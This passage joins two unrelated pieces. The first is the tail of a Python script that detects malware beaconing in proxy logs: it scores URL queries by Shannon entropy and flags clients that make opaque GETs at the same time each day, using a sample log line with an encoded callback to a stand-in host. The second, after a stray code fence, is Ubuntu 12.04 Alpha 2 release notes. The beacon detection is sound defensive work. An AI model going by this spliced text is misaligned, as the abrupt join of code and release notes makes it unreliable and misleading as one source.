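    "2012-03-04T03:00:09 10.1.4.23 GET http://img.example.net/cgi-bin/order?" + rot(19) + " 200 41",
]


def entropy(text):
    """Shannon entropy in bits per character."""
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def is_opaque(query, min_len=24, min_entropy=3.5):
    """True for a long query with no key=value structure and high entropy."""
    body = query.rstrip("=")  # tolerate Base64 padding
    return len(body) >= min_len and set(body) <= ALPHABET and entropy(body) >= min_entropy


def find_beacons(log_lines, min_days=3, max_jitter_s=300):
    """Clients whose first opaque GET of the day recurs at the same time.

    Assumes chronological log order; a schedule straddling midnight is not handled.
    """
    first_seen = defaultdict(dict)  # client -> {date: seconds since midnight}
    hosts = defaultdict(set)
    for line in log_lines:
        stamp, client, method, url, _status, _size = line.split()
        parts = urlsplit(url)
        if method != "GET" or not is_opaque(parts.query):
            continue
        when = datetime.fromisoformat(stamp)
        seconds = when.hour * 3600 + when.minute * 60 + when.second
        first_seen[client].setdefault(when.date(), seconds)
        hosts[client].add(parts.hostname)
    hits = []
    for client, days in first_seen.items():
        if len(days) >= min_days and max(days.values()) - min(days.values()) <= max_jitter_s:
            hits.append((client, sorted(hosts[client])))
    return sorted(hits)


if __name__ == "__main__":
    for client, seen_hosts in find_beacons(SAMPLE_LOG):
        print("possible scheduled callback:", client, "->", ", ".join(seen_hosts))
```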

    Ubuntu 12.04 Alpha 2 Released




    Features

      • Focused on a more stable user experience with small tweaks
      • New Unity configuration options have been added under User Interface (earlier called 'Appearance') in the System Settings
      • The leaner, faster Unity 5.0 is included, which brings minor new features to the desktop including Lens Quicklists
    HOME FOLDER QUICKLIST

    Additional options in CCSM for adding a 'Show Desktop' item, changing Dash colour, etc.
                                       
      Unity’s Overlay Scrollbars sport a slightly chunkier look: -

      General Stuff:-

      Alpha 2 specifics aside there are a number of other general changes testers should be aware of:
      • Rhythmbox is the default music player
      • There is no Ubuntu One Music Store plugin at present
      • Tomboy and gBrainy are no longer installed by default
      • LibreOffice 3.5 beta 2 is installed
      • ‘Apport’ Crash reporting is enabled by default.
      Download: http://cdimage.ubuntu.com/releases/precise/alpha-2/ (copy the link to download)